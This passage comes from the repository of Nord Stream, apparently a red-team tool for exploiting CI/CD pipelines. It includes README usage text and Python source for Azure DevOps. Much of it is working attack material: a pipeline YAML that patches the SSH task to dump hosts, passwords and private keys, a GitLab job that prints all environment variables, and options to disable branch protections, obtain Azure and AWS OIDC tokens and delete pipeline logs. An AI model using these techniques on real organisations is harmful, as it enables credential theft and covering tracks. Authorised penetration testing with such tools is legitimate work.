$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --key-id F94496913C43EFC5 --user test-gpg --email test.gpg@cicd.local --force
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] Getting secrets from environment: "prod" (synacktiv/repo)
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_PROD_SECRET=my PROD_SECRET
```
```bash
$ git verify-commit 00dcd856624bc9a41f8bd70662f0650839730973
gpg: Signature made Tue 18 Jul 2023 10:34:18 PM CEST
gpg: using DSA key B1583F439899C5A3B74ED04BF94496913C43EFC5
gpg: Good signature from "test-gpg <test.gpg@cicd.local>" [ultimate]
Primary key fingerprint: B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5
```
### Azure DevOps
Nord Stream can extract the following types of secrets:
- Variable groups (vg)
- Secure files (sf)
- Service connections
#### Service connections
Azure DevOps offers the possibility to create connections with external and remote services for executing tasks in a job. To do so, service connections are used. A service connection holds credentials for an identity to a remote service. There are multiple types of service connections in Azure DevOps.
Nord Stream currently support secret extraction for the following types of service connection:
- AzureRM
- GitHub
- AWS
- SonarQube
- SSH
If you come across a non-supported type, please open an issue or make a pull request :)
##### SSH
The extraction for this service connection type was painfull to implement. The output is the following:
```
hostname:::port:::user:::password:::privatekey
```
If you want to run it on a self-hosted runner you can do the following:
```
$ nord-stream devops ... --build-yaml test.yml --build-type ssh
[+] YAML file:
trigger: none
pool:
vmImage: ubuntu-latest
steps:
- checkout: none
- script: SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js) ; cp $SSH_FILE $SSH_FILE.bak
; sed -i 's|const readyTimeout = getReadyTimeoutVariable();|const readyTimeout
= getReadyTimeoutVariable();\nconst fs = require("fs");var data = "";data += hostname
+ ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("/tmp/artefacts.tar.gz",
data, (err) => {});|' $SSH_FILE
displayName: Preparing Build artefacts
- task: SSH@0
inputs:
sshEndpoint: '#FIXME'
runOptions: commands
commands: sleep 1
- script: SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js); mv $SSH_FILE.bak
$SSH_FILE ; cat /tmp/artefacts.tar.gz | base64 -w0 | base64 -w0 ; echo ''
displayName: Build artefacts
```
Then you need to:
1) change the `vmImage: ubuntu-latest` to `name: 'Self-Hosted pool name'`
2) Add the name of the service connection in the `#FIXME` placeholder.
3) deploy the pipeline with: `--yaml test.yml`
If you need to run this on a windows self-hosted runner, in the `generatePipelineForSSH` method change `_serviceConnectionTemplateSSH` by `_serviceConnectionTemplateSSHWindows` and perform the actions described previously.
Note: for both Windows and Linux self-hosted runners, you need to adapt the path (`/home/vsts/work/_tasks/` or `D:\a\`) to match the path where the runner is deployed. This information can be obtained in the `Capabilities` tab of an agent on Azure DevOps.
#### Listing orgs
With an access token it's possible to list the organizations bound to a user:
```
$ nord-stream devops --token "eyJ0eXA..." --list-orgs
[*] User orgs:
- myorg
- supersecretorg
```
This is based on [this research](https://zolder.io/en/blog/devops-access-is-closer-than-you-assume/).
#### Help
```
$ nord-stream devops -h
CICD pipeline exploitation tool
Usage:
nord-stream devops [options] --token <pat> --org <org> [extraction] [--project <project> --write-filter --no-clean --branch-name <name> --pipeline-name <name> --repo-name <name>]
nord-stream devops [options] --token <pat> --org <org> --yaml <yaml> --project <project> [--write-filter --no-clean --branch-name <name> --pipeline-name <name> --repo-name <name>]
nord-stream devops [options] --token <pat> --org <org> --build-yaml <output> [--build-type <type>]
nord-stream devops [options] --token <pat> --org <org> --clean-logs [--project <project>]
nord-stream devops [options] --token <pat> --org <org> --list-projects [--write-filter]
nord-stream devops [options] --token <pat> --org <org> (--list-secrets [--project <project> --write-filter] | --list-users)
nord-stream devops [options] --token <pat> --org <org> --describe-token
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
--ignore-cert Allow insecure server connections
Commit:
--user <user> User used to commit
--email <email> Email address used commit
--key-id <id> GPG primary key ID to sign commits
args:
--token <pat> Azure DevOps personal token or JWT
--org <org> Org name
-p, --project <project> Run on selected project (can be a file)
-y, --yaml <yaml> Run arbitrary job
--clean-logs Delete all pipeline created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean pipeline logs (default false)
--list-projects List all projects.
--list-secrets List all secrets.
--list-users List all users.
--write-filter Filter projects where current user has write or admin access.
--build-yaml <output> Create a pipeline yaml file with default configuration.
--build-type <type> Type used to generate the yaml file can be: default, azurerm, github, aws, sonar, ssh
--describe-token Display information on the token
--branch-name <name> Use specific branch name for deployment.
--pipeline-name <name> Use pipeline for deployment.
--repo-name <name> Use specific repo for deployment.
Exctraction:
--extract <list> Extract following secrets [vg,sf,gh,az,aws,sonar,ssh]
--no-extract <list> Don't extract following secrets [vg,sf,gh,az,aws,sonar,ssh]
Examples:
List all secrets from all projects
$ nord-stream devops --token "$PAT" --org myorg --list-secrets
Dump all secrets from all projects
$ nord-stream devops --token "$PAT" --org myorg
Authors: @hugow @0hexit
```
### GitHub
#### List protections
The `--list-protections` option can be used to list the protections applied to a branch and to environments:
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --list-protections
[*] Using branch: "main"
[*] Checking security: "synacktiv/repo"
[*] Found branch protection rule on "main" branch
[*] Branch protections:
- enforce admins: True
- block creations: True
- required signatures: True
- allow force pushes: False
- allow deletions: False
- required pull request reviews: False
- required linear history: False
- required conversation resolution: False
- lock branch: False
- allow fork syncing: False
[*] Environment protection for: "DEV":
- deployment branch policy: custom
[*] No environment protection rule found for: "INT"
[*] Environment protection for: "PROD":
- deployment branch policy: custom
```
Depending on your permissions, you can have less information, only administrators can have the full details of the protections.
#### Disable protections
The `--disable-protections` option can be used to temporarily disable the protections applied to a branch or an environment, realize the dump and restore all the protections:
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --no-repo --no-org --env prod --disable-protections
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] Found branch protection rule on "main" branch
[...]
[!] Removing branch protection, wait until it's restored.
[*] Getting secrets from environment: "prod" (synacktiv/repo)
[*] Environment protection for: "PROD":
- deployment branch policy: custom
[!] Modifying env protection, wait until it's restored.
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[!] Restoring env protections.
[+] Secrets:
secret_PROD_SECRET=my PROD_SECRET
[*] Cleaning logs.
[!] Restoring branch protection.
```
This requires admin privileges.
#### Force
By default, if Nord Stream detect a protection on a branch or on an environment it won't perform the secret extraction. If you think that the protections are too permissive or can be bypassed with your privileges, the `--force` option can be used to deploy the pipeline regardless of protections.
#### Azure OIDC
OIDC (OpenID Connect) can be used to connect to cloud services. The general idea is to allow authorized pipelines or workflows to get short-lived access tokens directly from a cloud provider, without involving any static secrets. Authorization is based on trust relationships configured on the cloud provider's side and being conditioned by the origin of the pipeline or workflow.
Here is an example of a GitHub workflow using OIDC:
```yaml
[...]
steps:
- name: OIDC Login to Azure Public Cloud
uses: azure/login@v1
with:
client-id: ${{ secrets.AZURE_CLIENT_ID }}
tenant-id: ${{ secrets.AZURE_TENANT_ID }}
subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }} # this can be optional
```
If you come across such a workflow, this means that the repository might be configured to get a short-lived access token that can give you access to Azure resources.
Nord Stream is able to deploy a pipeline to retrieve such access token with the following options:
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --azure-client-id 65cd6002-25b9-11ee-88ac-7f80b19430c2 --azure-tenant-id 65cd6002-25b9-11ee-88ac-7f80b19430c2
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] No branch protection rule found on "main" branch
[*] Running OIDC Azure access tokens generation workflow
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] OIDC access tokens:
Access token to use with Azure Resource Manager API:
{
"accessToken":
"eyJ0eXAiOiJK[...]PVig",
"expiresOn": "2023-07-18 23:18:57.000000",
"subscription": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
"tenant": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
"tokenType": "Bearer"
}
Access token to use with MS Graph API:
{
"accessToken":
"eyJ0eXAi[...]_qTA",
"expiresOn": "2023-07-19 22:18:59.000000",
"subscription": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
"tenant": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
"tokenType": "Bearer"
}
```
The `--azure-subscription-id` is optional and can be used to get an access token for a specific subscription.
#### AWS OIDC
The same technique (see [Azure OIDC](#azure-oidc)) can be used to get a session token on AWS.
Here is an example of a workflow using AWS OIDC:
```yaml
[...]
steps:
- name: Configure AWS Credentials
uses: aws-actions/configure-aws-credentials@v1
with:
role-to-assume: arn:aws:iam::133333333337:role/S3Access/CustomRole
role-session-name: oidcrolesession
aws-region: us-east-1
```
If you come across such a workflow, this means that the repository might be configured to get an AWS access token that can give you access to AWS resources.
Nord Stream is able to deploy a pipeline to retrieve such access token with the following options:
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --aws-role 'arn:aws:iam::133333333337:role/S3Access/CustomRole' --aws-region us-east-1 --force
[+] "Synacktiv/repo"
[*] Running OIDC AWS credentials generation workflow
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] OIDC credentials:
AWS_DEFAULT_REGION=us-east-1
AWS_SESSION_TOKEN=IQoJb3[...]KMs0/QB6
AWS_REGION=us-east-1
AWS_ACCESS_KEY_ID=ASIA5ABC8XDMAP2ANNWO
AWS_SECRET_ACCESS_KEY=7KJLCjdJKqlpLKDAI9F7SH6SjSQBX68Sjm13xXDA
```
#### Help
```
$ nord-stream github -h
CICD pipeline exploitation tool
Usage:
nord-stream github [options] --token <ghp> --org <org> [--repo <repo> --no-repo --no-env --no-org --env <env> --disable-protections --branch-name <name> --no-clean (--key-id <id> --user <user> --email <email>)]
nord-stream github [options] --token <ghp> --org <org> --yaml <yaml> --repo <repo> [--env <env> --disable-protections --branch-name <name> --no-clean (--key-id <id> --user <user> --email <email>)]
nord-stream github [options] --token <ghp> --org <org> ([--clean-logs] [--clean-branch-policy]) [--repo <repo> --branch-name <name>]
nord-stream github [options] --token <ghp> --org <org> --build-yaml <filename> --repo <repo> [--env <env>]
nord-stream github [options] --token <ghp> --org <org> --azure-tenant-id <tenant> --azure-client-id <client> [--azure-subscription-id <subscription> --repo <repo> --env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> --aws-role <role> --aws-region <region> [--repo <repo> --env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> --list-protections [--repo <repo> --branch-name <name> --disable-protections (--key-id <id> --user <user> --email <email>)]
nord-stream github [options] --token <ghp> --org <org> --list-secrets [--repo <repo> --no-repo --no-env --no-org]
nord-stream github [options] --token <ghp> [--org <org>] --list-repos [--write-filter]
nord-stream github [options] --token <ghp> --describe-token
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
Signing:
--key-id <id> GPG primary key ID
--user <user> User used to sign commits
--email <email> Email address used to sign commits
args
--token <ghp> Github personal token
--org <org> Org name
-r, --repo <repo> Run on selected repo (can be a file)
-y, --yaml <yaml> Run arbitrary job
--clean-logs Delete all logs created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean workflow logs (default false)
--clean-branch-policy Remove branch policy, can be used with --repo. This operation is done by default but can be manually triggered.
--build-yaml <filename> Create a pipeline yaml file with all secrets.
--env <env> Specify env for the yaml file creation.
--no-repo Don't extract repo secrets.
--no-env Don't extract environnments secrets.
--no-org Don't extract organization secrets.
--azure-tenant-id <tenant> Identifier of the Azure tenant associated with the application having federated credentials (OIDC related).
--azure-subscription-id <subscription> Identifier of the Azure subscription associated with the application having federated credentials (OIDC related).
--azure-client-id <client> Identifier of the Azure application (client) associated with the application having federated credentials (OIDC related).
--aws-role <role> AWS role to assume (OIDC related).
--aws-region <region> AWS region (OIDC related).
--list-protections List all protections.
--list-repos List all repos.
--list-secrets List all secrets.
--disable-protections Disable the branch protection rules (needs admin rights)
--write-filter Filter repo where current user has write or admin access.
--force Don't check environment and branch protections.
--branch-name <name> Use specific branch name for deployment.
--describe-token Display information on the token
Examples:
List all secrets from all repositories
$ nord-stream github --token "$GHP" --org myorg --list-secrets
Dump all secrets from all repositories and try to disable branch protections
$ nord-stream github --token "$GHP" --org myorg --disable-protections
Authors: @hugow @0hexit
```
### GitLab
As described in the article, there is no way to remove the logs in the activity tab after a pipeline deployment. This must be taken into account during Red Team engagements.
#### List secrets
The `--list-secrets` option can be used to list and extract secrets from GitLab.
The way in which GitLab manages secrets is a bit different from Azure DevOps and GitHub action. With admin access to a project, group or even admin access on the GitLab instance, it is possible to extract all the CI/CD variables that are defined without deploying any pipeline.
From a low privilege user however, it is not possible to list the secrets that are defined at the project / group or instance levels. However, if users have write privileges over a project, they will be able to deploy a malicious pipeline to exfiltrate the environment variables exposing the CI/CD variables. This means that a low privilege user has no mean to know if a secret is defined in a specific project. The only way is to look at legitimate pipelines that are already present in a project and check if a pipeline uses sensitive environment variables.
Here is a pipeline file to perform this operation on GitLab:
```yaml
stages:
- synacktiv
deploy-production:
image: ubuntu:latest
stage: synacktiv
script:
- env | base64 -w0 | base64 -w 0
```
GitLab also support secure files like Azure DevOps. Secure files are defined at the project level. Like the variables It's not possible to list the secure files without admin access to the project. However, with admin access nord-stream will try to exfiltrate the secure files related to the projects.
#### YAML
Same as [YAML](#yaml), however you need to provide the full project path like this:
```sh
$ nord-stream gitlab --token "$PAT" --url https://gitlab.corp.local --project 'group/projectname' --yaml ci.yml
```
The output of the command `--list-projects` returns such path.
#### List protections
Same as [GitHub list protections](#list-protections)
#### Help
```
$ nord-stream gitlab -h
CICD pipeline exploitation tool
Usage:
nord-stream gitlab [options] --token <pat> (--list-secrets | --list-protections) [--project <project> --group <group> --no-project --no-group --no-instance --write-filter]
nord-stream gitlab [options] --token <pat> ( --list-groups | --list-projects ) [--project <project> --group <group> --write-filter]
nord-stream gitlab [options] --token <pat> --yaml <yaml> --project <project> [--no-clean]
nord-stream gitlab [options] --token <pat> --clean-logs [--project <project>]
nord-stream gitlab [options] --token <pat> --describe-token
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
--url <gitlab_url> Gitlab URL [default: https://gitlab.com]
--ignore-cert Allow insecure server connections
Commit:
--user <user> User used to commit
--email <email> Email address used commit
--key-id <id> GPG primary key ID to sign commits
args:
--token <pat> GitLab personal access token or _gitlab_session cookie
--project <project> Run on selected project (can be a file)
--group <group> Run on selected group (can be a file)
--list-secrets List all secrets.
--list-protections List branch protection rules.
--list-projects List all projects.
--list-groups List all groups.
--write-filter Filter repo where current user has developer access or more.
--no-project Don't extract project secrets.
--no-group Don't extract group secrets.
--no-instance Don't extract instance secrets.
-y, --yaml <yaml> Run arbitrary job
--branch-name <name> Use specific branch name for deployment.
--clean-logs Delete all pipeline logs created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean pipeline logs (default false)
--describe-token Display information on the token
Examples:
Dump all secrets
$ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --list-secrets
Deploy the custom pipeline on the master branch
$ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --yaml exploit.yaml --branch master --project 'group/projectname'
Authors: @hugow @0hexit
```
## TODO
- [ ] Add support of URLs corresponding to Azure DevOps Server instances (on-premises solutions)
- [ ] Add an option to extract secrets via Windows hosts
- [ ] Add support of other CI/CD environments (Jenkins/Bitbucket)
- [ ] Use the GitHub GraphQL API instead of the REST one to list the branch protection rules and temporarily disable them if they match the malicious branch about to be pushed
## Contact
Please submit any bugs, issues, questions, or feature requests under "Issues" or send them to us on Twitter [@hugow](https://twitter.com/hugow_vincent) and [@0hexit](https://twitter.com/0hexit).
================================================
FILE: nordstream/__main__.py
================================================
#!/usr/bin/env python3
"""
CICD pipeline exploitation tool
Usage:
nord-stream <command> [<args>...]
Commands
github command related to GitHub.
devops command related to Azure DevOps.
gitlab command related to GitLab.
Options:
-h --help Show this screen.
--version Show version.
Authors: @hugow @0hexit
"""
from docopt import docopt
from nordstream.utils.log import logger
def main():
args = docopt(__doc__, version="0.1", options_first=True)
argv = [args["<command>"]] + args["<args>"]
if args["<command>"] == "github":
import nordstream.commands.github as github
github.start(argv)
elif args["<command>"] == "devops":
import nordstream.commands.devops as devops
devops.start(argv)
elif args["<command>"] == "gitlab":
import nordstream.commands.gitlab as gitlab
gitlab.start(argv)
else:
logger.error(f"{args['<command>']} is not a nord-stream command.")
if __name__ == "__main__":
main()
================================================
FILE: nordstream/cicd/devops.py
================================================
import requests
import time
from os import makedirs
from nordstream.utils.log import logger
from nordstream.yaml.devops import DevOpsPipelineGenerator
from nordstream.git import Git
from nordstream.utils.errors import DevOpsError
from nordstream.utils.constants import *
from nordstream.utils.helpers import isAZDOBearerToken
# painfull warnings you know what you are doing right ?
requests.packages.urllib3.disable_warnings()
class DevOps:
_DEFAULT_PIPELINE_NAME = DEFAULT_PIPELINE_NAME
_DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME
_token = None
_auth = None
_org = None
_devopsLoginId = None
_projects = []
_baseURL = "https://dev.azure.com/"
_header = {
"Accept": "application/json; api-version=6.0-preview",
"User-Agent": USER_AGENT,
}
_session = None
_repoName = DEFAULT_REPO_NAME
_outputDir = OUTPUT_DIR
_pipelineName = _DEFAULT_PIPELINE_NAME
_branchName = _DEFAULT_BRANCH_NAME
_defaultAgentPool = None
_sleepTime = 15
_maxRetry = 10
def __init__(self, token, org, verifCert):
self._token = token
self._org = org
self._baseURL += f"{org}/"
self._session = requests.Session()
self.setCookiesAndHeaders()
self._session.verify = verifCert
self._devopsLoginId = self.__getLogin()
@property
def projects(self):
return self._projects
@property
def org(self):
return self._org
@property
def branchName(self):
return self._branchName
@branchName.setter
def branchName(self, value):
self._branchName = value
@property
def repoName(self):
return self._repoName
@repoName.setter
def repoName(self, value):
self._repoName = value
@property
def pipelineName(self):
return self._pipelineName
@pipelineName.setter
def pipelineName(self, value):
self._pipelineName = value
@property
def defaultAgentPool(self):
return self._defaultAgentPool
@defaultAgentPool.setter
def defaultAgentPool(self, value):
self._defaultAgentPool = value
@property
def sleepTime(self):
return self._sleepTime
@sleepTime.setter
def sleepTime(self, value):
self._sleepTime = int(value)
@property
def token(self):
return self._token
@property
def outputDir(self):
return self._outputDir
@outputDir.setter
def outputDir(self, value):
self._outputDir = value
@property
def defaultPipelineName(self):
return self._DEFAULT_PIPELINE_NAME
@property
def defaultBranchName(self):
return self._DEFAULT_BRANCH_NAME
def __getLogin(self):
return self.getUser().get("authenticatedUser").get("id")
def getUser(self):
logger.debug("Retrieving user informations")
return self._session.get(
f"{self._baseURL}/_apis/ConnectionData",
).json()
def setCookiesAndHeaders(self):
if isAZDOBearerToken(self._token):
self._session.headers.update({"Authorization": f"Bearer {self._token}"})
else:
self._session.auth = ("", self._token)
self._session.headers.update(self._header)
def listProjects(self):
logger.debug("Listing projects")
continuationToken = 0
# Azure DevOps pagination
while True:
params = {"continuationToken": continuationToken}
response = self._session.get(
f"{self._baseURL}/_apis/projects",
params=params,
).json()
if len(response.get("value")) != 0:
for repo in response.get("value"):
p = {"id": repo.get("id"), "name": repo.get("name")}
self._projects.append(p)
continuationToken += response.get("count")
else:
break
def listUsers(self):
logger.debug("Listing users")
continuationToken = None
res = []
params = {}
# Azure DevOps pagination
while True:
if continuationToken:
params = {"continuationToken": continuationToken}
response = self._session.get(
f"https://vssps.dev.azure.com/{self._org}/_apis/graph/users",
params=params,
)
headers = response.headers
response = response.json()
if len(response.get("value")) != 0:
for user in response.get("value"):
p = {
"origin": user.get("origin"),
"displayName": user.get("displayName"),
"mailAddress": user.get("mailAddress"),
}
res.append(p)
continuationToken = headers.get("x-ms-continuationtoken", None)
if not continuationToken:
break
else:
break
return res
# TODO: crappy code I know
def filterWriteProjects(self):
continuationToken = None
res = []
params = {}
# Azure DevOps pagination
while True:
if continuationToken:
params = {"continuationToken": continuationToken}
response = self._session.get(
f"https://vssps.dev.azure.com/{self._org}/_apis/graph/groups",
params=params,
)
headers = response.headers
response = response.json()
if len(response.get("value")) != 0:
for project in self._projects:
for group in response.get("value"):
name = project.get("name")
if self.__checkProjectPrivs(self._devopsLoginId, name, group):
duplicate = False
for p in res:
if p.get("id") == project.get("id"):
duplicate = True
if not duplicate:
res.append(project)
continuationToken = headers.get("x-ms-continuationtoken", None)
if not continuationToken:
break
else:
break
self._projects = res
def __checkProjectPrivs(self, login, projectName, group):
groupPrincipalName = group.get("principalName")
writeGroups = [
f"[{projectName}]\\{projectName} Team",
f"[{projectName}]\\Contributors",
f"[{projectName}]\\Project Administrators",
]
pagingToken = None
params = {}
for g in writeGroups:
if groupPrincipalName == g:
originId = group.get("originId")
while True:
if pagingToken:
params = {"pagingToken": pagingToken}
response = self._session.get(
f"https://vsaex.dev.azure.com/{self._org}/_apis/GroupEntitlements/{originId}/members",
params=params,
).json()
pagingToken = response.get("continuationToken")
if len(response.get("items")) != 0:
for user in response.get("items"):
if user.get("id") == login:
return True
else:
return False
def listRepositories(self, project):
logger.debug("Listing repositories")
response = self._session.get(
f"{self._baseURL}/{project}/_apis/git/repositories",
).json()
return response.get("value")
def listPipelines(self, project):
logger.debug("Listing pipelines")
response = self._session.get(
f"{self._baseURL}/{project}/_apis/pipelines",
).json()
return response.get("value")
def addProject(self, project):
logger.debug(f"Checking project: {project}")
response = self._session.get(
f"{self._baseURL}/_apis/projects/{project}",
).json()
if response.get("id"):
p = {"id": response.get("id"), "name": response.get("name")}
self._projects.append(p)
@classmethod
def checkToken(cls, token, org, verifCert):
logger.verbose(f"Checking token: {token}")
try:
return (
requests.get(
f"https://dev.azure.com/{org}/_apis/ConnectionData",
auth=("foo", token),
headers=DevOps._header,
verify=verifCert,
).status_code
== 200
)
except Exception as e:
logger.error(e)
return False
def listProjectVariableGroupsSecrets(self, project):
logger.debug(f"Listing variable groups for: {project}")
response = self._session.get(
f"{self._baseURL}/{project}/_apis/distributedtask/variablegroups",
)
if response.status_code != 200:
raise DevOpsError("Can't list variable groups secrets.")
response = response.json()
res = []
if response.get("count", 0) != 0:
for variableGroup in response.get("value"):
name = variableGroup.get("name")
id = variableGroup.get("id")
variables = []
for var in variableGroup.get("variables").keys():
variables.append(var)
res.append({"name": name, "id": id, "variables": variables})
return res
def listProjectSecureFiles(self, project):
logger.debug(f"Listing secure files for: {project}")
response = self._session.get(
f"{self._baseURL}/{project}/_apis/distributedtask/securefiles",
)
if response.status_code != 200:
raise DevOpsError("Can't list secure files.")
response = response.json()
res = []
if response["count"]:
for secureFile in response["value"]:
res.append({"name": secureFile["name"], "id": secureFile["id"]})
return res
def authorizePipelineForResourceAccess(self, projectId, pipelineId, resource, resourceType):
resourceId = resource["id"]
logger.debug(f"Checking current pipeline permissions for: \"{resource['name']}\"")
response = self._session.get(
f"{self._baseURL}/{projectId}/_apis/pipelines/pipelinePermissions/{resourceType}/{resourceId}",
).json()
allPipelines = response.get("allPipelines")
if allPipelines and allPipelines.get("authorized"):
return True
for pipeline in response.get("pipelines"):
if pipeline.get("id") == pipelineId:
return True
logger.debug(f"\"{resource['name']}\" has restricted permissions. Adding access permissions for the pipeline")
response = self._session.patch(
f"{self._baseURL}/{projectId}/_apis/pipelines/pipelinePermissions/{resourceType}/{resourceId}",
json={"pipelines": [{"id": pipelineId, "authorized": True}]},
)
if response.status_code != 200:
logger.error(f"Error: unable to give the custom pipeline access to {resourceType}: \"{resource['name']}\"")
return False
return True
def createGit(self, project):
logger.debug(f"Creating git repo for: {project}")
data = {"name": self._repoName, "project": {"id": project}}
response = self._session.post(
f"{self._baseURL}/{project}/_apis/git/repositories",
json=data,
).json()
return response
def deleteGit(self, project, repoId):
logger.debug(f"Deleting git repo for: {project}")
response = self._session.delete(
f"{self._baseURL}/{project}/_apis/git/repositories/{repoId}",
)
return response.status_code == 204
def createPipeline(self, project, repoId, path):
logger.debug("Creating pipeline")
data = {
"folder": None,
"name": self._pipelineName,
"configuration": {
"type": "yaml",
"path": path,
"repository": {
"id": repoId,
"type": "azureReposGit",
"defaultBranch": self._branchName,
},
},
}
response = self._session.post(
f"{self._baseURL}/{project}/_apis/pipelines",
json=data,
).json()
pipeline_id = response.get("id")
if self._defaultAgentPool:
logger.debug("Setting default agent pool")
# Retrieve project queues, not organization pools, for Default agent pool
queues_url = f"{self._baseURL}/{project}/_apis/distributedtask/queues"
response = self._session.get(queues_url)
queues = response.json()
queue_id = None
queue_name = None
for queue in queues['value']:
if queue['pool']['name'] == self._defaultAgentPool:
queue_id = queue['id']
queue_name = queue['name']
logger.info(f"Queue found : {queue_name} (Queue ID: {queue_id}, Pool ID: {queue['pool']['id']})")
break
if not queue_id:
logger.error(f"Queue {self._defaultAgentPool} not found for default agent pool, or not accessible by the project. Not updating")
return pipeline_id
# Update pipeline Default agent with specified queue, via the definitions API
update_url = f"{self._baseURL}/{project}/_apis/build/definitions/{pipeline_id}"
response = self._session.get(update_url)
definition = response.json()
# Add default pool agent with queue
definition['queue'] = {
'id': queue_id,
'name': queue_name
}
response = self._session.put(update_url, json=definition)
return pipeline_id
def runPipeline(self, project, pipelineId):
logger.debug(f"Running pipeline: {pipelineId}")
params = {
"definition": {"id": pipelineId},
"sourceBranch": f"refs/heads/{self._branchName}",
}
response = self._session.post(
f"{self._baseURL}/{project}/_apis/build/Builds",
json=params,
).json()
return response
def __getBuilds(self, project):
logger.debug(f"Getting builds.")
return (
self._session.get(
f"{self._baseURL}/{project}/_apis/build/Builds",
)
.json()
.get("value")
)
def __getBuildSources(self, project, buildId):
return self._session.get(
f"{self._baseURL}/{project}/_apis/build/Builds/{buildId}/sources",
).json()
def getRunId(self, project, pipelineId):
logger.debug(f"Getting RunId for pipeline: {pipelineId}")
for i in range(self._maxRetry):
# Don't wait first time
if i != 0:
logger.warning(f"Run not available, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
for build in self.__getBuilds(project):
if build.get("definition").get("id") == pipelineId:
buildId = build.get("id")
buildSource = self.__getBuildSources(project, buildId)
if (
buildSource.get("comment") == Git.ATTACK_COMMIT_MSG
and buildSource.get("author").get("email") == Git.EMAIL
):
return buildId
if i == (self._maxRetry):
logger.error("Error: run still not ready.")
return None
def waitPipeline(self, project, pipelineId, runId):
logger.info("Getting pipeline output")
for i in range(self._maxRetry):
if i != 0:
logger.warning(f"Pipeline still running, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
response = self._session.get(
f"{self._baseURL}/{project}/_apis/pipelines/{pipelineId}/runs/{runId}",
json={},
).json()
if response.get("state") == "completed":
return response.get("result")
if i == (self._maxRetry - 1):
logger.error("Error: pipeline still not finished.")
return None
def __createPipelineOutputDir(self, projectName):
makedirs(f"{self._outputDir}/{self._org}/{projectName}", exist_ok=True)
def downloadPipelineOutput(self, projectId, runId):
self.__createPipelineOutputDir(projectId)
for i in range(self._maxRetry):
if i != 0:
logger.warning(f"Output not ready, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
buildTimeline = self._session.get(
f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/timeline",
json={},
).json()
logs = [
record["log"]["id"]
for record in buildTimeline["records"]
if record["name"] == DevOpsPipelineGenerator.taskName
]
if len(logs) != 0:
break
# if there are logs but we didn't find the taskName get the last
# job as it contain all data
if len(buildTimeline["records"]) > 0:
logs = [buildTimeline["records"][-1]["log"]["id"]]
break
if i == (self._maxRetry - 1):
logger.error("Output still no ready, error !")
return None
logId = logs[0]
logger.debug(f"Log ID of the extraction task: {logId}")
for i in range(self._maxRetry):
if i != 0:
logger.warning(f"Output not ready, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
logOutput = self._session.get(
f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/logs/{logId}",
json={},
).json()
if len(logOutput.get("value")) != 0:
break
if i == (self._maxRetry - 1):
logger.error("Output still no ready, error !")
return None
date = time.strftime("%Y-%m-%d_%H-%M-%S")
with open(f"{self._outputDir}/{self._org}/{projectId}/pipeline_{date}.log", "w") as f:
for line in logOutput.get("value"):
f.write(line + "\n")
f.close()
return f"pipeline_{date}.log"
def __cleanRunLogs(self, projectId):
logger.verbose("Cleaning run logs.")
builds = self.__getBuilds(projectId)
if len(builds) != 0:
for build in builds:
buildId = build.get("id")
buildSource = self.__getBuildSources(projectId, buildId)
if (
buildSource.get("comment") == (Git.ATTACK_COMMIT_MSG or Git.CLEAN_COMMIT_MSG)
and buildSource.get("author").get("email") == Git.EMAIL
):
return buildId
self._session.delete(
f"{self._baseURL}/{projectId}/_apis/build/builds/{buildId}",
)
def __cleanPipeline(self, projectId):
logger.verbose(f"Removing pipeline.")
response = self._session.get(
f"{self._baseURL}/{projectId}/_apis/pipelines",
).json()
if response.get("count", 0) != 0:
for pipeline in response.get("value"):
if pipeline.get("name") == self._pipelineName:
pipelineId = pipeline.get("id")
self._session.delete(
f"{self._baseURL}/{projectId}/_apis/pipelines/{pipelineId}",
)
def deletePipeline(self, projectId):
logger.debug("Deleting pipeline")
response = self._session.get(
f"{self._baseURL}/{projectId}/_apis/build/Definitions",
json={},
).json()
if response.get("count", 0) != 0:
for pipeline in response.get("value"):
if pipeline.get("name") == self._pipelineName:
definitionId = pipeline.get("id")
self._session.delete(
f"{self._baseURL}/{projectId}/_apis/build/definitions/{definitionId}",
json={},
)
def cleanAllLogs(self, projectId):
